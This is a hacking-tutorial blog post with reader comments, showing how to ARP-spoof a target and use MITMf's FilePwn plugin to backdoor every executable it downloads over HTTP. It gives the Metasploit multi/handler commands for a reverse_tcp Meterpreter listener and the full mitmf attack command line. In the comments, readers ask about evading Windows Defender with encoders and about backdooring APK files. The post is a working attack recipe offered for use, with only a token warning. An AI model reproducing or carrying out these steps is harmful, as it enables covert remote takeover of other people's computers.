Do you remember my last article on how to hook any web browser with MITMf and BeEF? Well, we are using the tool once again, but this time for auto-backdooring....
How It Works
MITMf (if you don't already know) is a man in the middle attack framwork. MITMf literally stands for "Man In The Middle framework." It includes many, many different tools to help you with MitM attacks. In this case, we are automatically backdooring every downloaded executable for one specific machine. Cool, eh?
We will be ARP spoofing a Windows 8.1 VM machine in this test.
Note: This only works for HTTP sites, so you might want to use SSLstrip+ for any HTTPS sites.
Requirements
You will only need MITMf and Metasploit for this attack. You can download it from either the aptitude repository (apt-get install mitmf), or through the GitHub repository (git clone https://github.com/byt3bl33d3r/MITMf).
If you choose to install via the apt, remember to run apt-get update first.
Metasploit is build-in to Kali.
Step 1: Editing the Configurations
Now that we have MITMf installed, we need to edit the config files to match our system. We will edit the config file located in /usr/share/mitmf/config/mitmf.cfg.
Scroll down until you get to the FilePwn section.
You can see that under the CompressedFiles section, there is a configuration for many useful payloads. Set the HOST variable to match your IP, but don't change the port. Just remember the port number for the payload you want to use.
Step 2: Selecting the Target
When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case, I'm targeting a Windows 8.1 machine, so I would use WindowsIntelx86. The port number for that is 8443. Remember your payload's port number for later.
Step 3: Set Up a Listener
We're going to be using Metasploit as our payload listener. Type use multi/handler and then set your payload. in this case, I'm using Meterpreter.
set PAYLOAD windows/meterpreter/reverse_tcp
Set the LHOST and LPORT options...
set LHOST 10.0.2.117
set LPORT 8443 (Make sure you set the corresponding port number!)
Then exploit -j. Open up a new terminal...
Step 4: Running the Attack
To run the attack, use the following command:
mitmf --spoof --arp -i <interface> --gateway <gateway IP> --target <target IP> --filepwn
For me it would be:
mitmf --spoof --arp -i wlan0 --gateway 10.0.2.1 --target 10.0.2.15 --filepwn
Pretty soon you should be getting output like this:
If a user downloads a file, and the file is patchable. you should get some output saying "File patched successfully. Sending to target." if it successfully backdoored. As soon as the victim opens the file, you should get a Meterpreter prompt.
If it doesn't say it's patched, it can't be. Unfortunately, this tactic doesn't work 100% of the time.
Conclusion
Now we know how to run a very neat trick--backdooring on the fly. This gets even better if you do this via mobile, as you will be very discrete. Don't abuse this power. As said in the help menu for MITMf quoting Yoda, "Use wisely, young padawan."
C|H of C3
NOTE: This had been sitting in my drafts for a month now. I've been waiting to post this for a long time.
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
37 Comments
Respect+
Another great article, thank you Cracker|Hacker.
You're welcome. :)
By using it from a phone
Do you mean get Linuxdeploy/Nethunter ?
Yes.
This is going to be so awsome when i use this on my phone thanks man +1 great post
You're welcome. :)
Just the other day I started playing around with MITM, glad you have a good series on it :D
Yeah, I'm just probably going to write an MitM series.
Now, there is an alternative to MITMf, and that's using an evil AP. Should I write something up on that as well (it might take a while)?
of course You should! (if you haven't yet, cause it's been a year since you posted it :) )
Cracker Hacker your a magician at MitM
I have always found much interest in it. Thanks. :)
Cracker | Hacker,
You should definitely, write a tutorial on Evil AP,
No Worries, we can wait :)
Alright, I'll get on it as soon as I get some sleep. *yawn...*
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
Haha :)
When I download for example Puttty like you did, I get this output in mitmf:
2015-07-02 22:51:08 192.168.178.27 Detected supported binary type!
* In the backdoor module
* Checking if binary is supported
* Gathering file info
* Reading win32 entry instructions
The following bdfactorys are available: (use -s)
caveminerinline
iatreversetcpinline
iatreversetcpinlinethreaded
iatreversetcpstagerthreaded
iatusersuppliedshellcodethreaded
meterpreterreversehttpsthreaded
reverseshelltcpinline
reversetcpstagerthreaded
usersuppliedshellcodethreaded
And the target pc just downloads the file and 'gets away'.
What am I missing here?
And by the way, does this only work on .exe files?
ApeRock
I don't know about the 1st question...
MITMf backdoored .exe and .zip files.
same thing i get, and i cant find any information anywhere about how to solve this issue. any help is greatly appreciated
What i have to do after this show up?
The following bdfactorys are available: (use -s)
caveminerinline
iatreversetcpinline
iatreversetcpinlinethreaded
iatreversetcpstagerthreaded
iatusersuppliedshellcodethreaded
meterpreterreversehttpsthreaded
reverseshelltcpinline
reversetcpstagerthreaded
usersuppliedshellcodethreaded
Perhaps the executable was not backdoorable, but I'm not fully sure.
I got the same! Pretty weird...
Great tutorial however there is one thing. Windows defender is pretty proficient at picking up metasploit backdoored executables. It even auto deletes them sometimes. I would reccomend Hyperion or some other third party encoders, I'm assuming you'd need to generate the custom shellcode and supply it to mitmf instead of using the default MSF payload? Many thanks for introducing me to this :)
Yes, you are correct.
How to I change the payload to a python AES encrypted payload?
I didnt get what it exactly does... does it inject payload to a file that the victim wanted to download??
Or just sends a file to victim pc??
So like I downloaded a program say winrar.exe
What itll do is inject payload into winrara.exe??
And winrar.exe will work normally as its supposed to and in the background our payload will work too??
Yes, it should, but not always.
Wow thnx thats really awesome!!
So this is showing the data going but hasn't showed the files created successfully. Does it just take a long time or do I need to be browsing more?
Is encryption on the fly possible?
It's cool thing but I suppose that without encryption it's pretty worthless in practice or am I wrong?
At step 2 .. for a windows 7 machine 64bit would I use the same as in the tutorial or the windowsintelx64?
You should use windiwsintelx64 since you are using a 64 bit system. I´m not completely sure but i think you can use thex86 (32 bit) one on a 64 bit system, since windows should have compatibility for it.
Hello. This was a very nice tutorial for beginners. Though the last phrase was a bit vague: ''If it doesn't say it's patched, it can't be. Unfortunately, this tactic doesn't work 100% of the time.''. Is there any manual page or something that specifies when it does work and when not??
Hi Great Cracker|Hacker :)
""" How can I backdoor an .apk file on the fly? """
Once I started infecting apks , after injecting my malicious codes in the apk file I had problems with signing them, then I solved this with an sign.jar file. I think this problem would happen for backdooring apks on the fly. Am I right?
hi i tried this tutorial but when i start mitmf i get this error:
'Msfrpc Error connecting to Metasploit: HTTPConnectionPool(host='127.0.0.1', port=55552): Max retries exceeded with url: /api/ (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0x7ff287416ed0>: Failed to establish a new connection: Errno 111 Connection refused',))'
when i tried mitmf witout the filepwn option it works without error
i have changed the host like you said in the tutorial, do i need to make more changes in de .conf file to make it work?
During filepwn I get this:
Traceback (most recent call last):
File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
a = f(*args)
File "/usr/share/mitmf/plugins/filepwn.py", line 614, in response
content_header = response.headers'content-type'
File "/usr/local/lib/python2.7/dist-packages/twisted/web/http_headers.py", line 50, in _getitem_
raise KeyError(key)
KeyError: 'content-type'
I'm using Twisted 1.5.5.0 if that helps. The newer version doesn't seem to work with mitmf for a lot of people. Any help is greatly appreciated.
Share Your Thoughts